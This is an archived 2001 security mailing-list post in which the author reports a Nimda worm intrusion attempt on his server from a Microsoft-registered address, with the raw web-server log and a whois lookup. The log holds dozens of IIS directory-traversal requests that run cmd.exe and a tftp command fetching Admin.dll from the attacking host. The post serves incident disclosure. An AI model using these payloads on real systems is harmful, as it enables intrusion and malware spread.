Forwarded from: Jay D. Dyson <jdysonat_private> Also sent to SecurityFocus's Incidents list. -----BEGIN PGP SIGNED MESSAGE----- Hi folks, Normally I wouldn't be sending this out, but I figure folks need to be aware and wary, considering the origin of this intrusion attempt. I received an early Xmas present from Microsoft. No, I didn't get XP, nor did I get the latest Office software suite. I got a Nimda intrusion attempt. Early Bird[1] picked up on this intrusion attempt and immediately notified Microsoft. I've yet to hear back from Microsoft as to why this attack from their network came to pass[2]. For those who are interested, here's the log excerpt. 208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-" $ whois -h whois.arin.net 208.229.100.126 Microsoft Labs (NETBLK-UU-208-229-100-D1) One Microsoft Way Redmond, WA 98052 US Netname: UU-208-229-100-D1 Netblock: 208.229.100.0 - 208.229.101.255 Coordinator: Steig, Rick (RS8676-ARIN) a-rickstat_private (425) 703-3061 Record last updated on 03-Nov-1997. Database last updated on 27-Dec-2001 19:55:32 EDT. - -Jay 1. http://www.treachery.net/earlybird/ 2. If anyone from Microsoft is reading this, I'd appreciate something more pleasant next holiday season. (FYI, the machine you hit ran XP for only 15 seconds. It now runs Linux.) ( ( _______ )) )) .-"There's always time for a good cup of coffee"-. >====<--. C|~~|C|~~| (>----- Jay D. Dyson -- jdysonat_private -----<) | = |-' `--' `--' `---------- Si vis pacem, para bellum. ----------' `------' -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: See http://www.treachery.net/~jdyson/ for current keys. iQCVAwUBPC0YPrlDRyqRQ2a9AQFXDAQAoXxjVbh6fTzpUPyQFB8aJGpxOLg/+Om+ 1Zck8Fw7/tfKsq97YLSqSsp2r4Q5+ybQqXxdnbLVgVsPhKhazzXNrcPKWXhYQU8q BYT1edg658tvKND0I5NeWoU+vzqzR0NPtppmBKCEMlwz+zG2Nz3nTzT7jMpzmxPo uNDtpRKBcGs= =9DpW -----END PGP SIGNATURE----- - ISN is currently hosted by Attrition.org To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY of the mail.
This archive was generated by hypermail 2b30 : Sat Dec 29 2001 - 01:19:18 PST